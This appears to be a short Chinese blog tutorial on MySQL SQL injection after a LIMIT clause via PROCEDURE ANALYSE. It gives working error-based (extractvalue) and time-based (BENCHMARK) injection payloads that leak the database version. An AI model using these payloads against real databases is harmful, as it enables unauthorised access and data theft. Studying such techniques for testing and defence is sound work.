先了解一个存储过程analyse:通过分析select查询的结果来对每一列给出优化建议。
主要就是通过它来执行我们的报错语句和延时语句。
这个是正常情况查询:
mysql> select * from admin;
+----+---------------+----------+
| id | email | password |
+----+---------------+----------+
| 1 | [email protected] | 123456 |
| 2 | [email protected] | 123456 |
| 3 | [email protected] | 123 |
+----+---------------+----------+
3 rows in set (0.01 sec)
limit后的报错注入:
mysql> select * from admin order by id limit 0,1 procedure analyse(extractvalue(
rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.32'
limit后的延时注入:
mysql> SELECT * FROM admin ORDER BY id LIMIT 0,1 PROCEDURE analyse((select extra
ctvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1
(1)),1))))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'//已经延时了
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论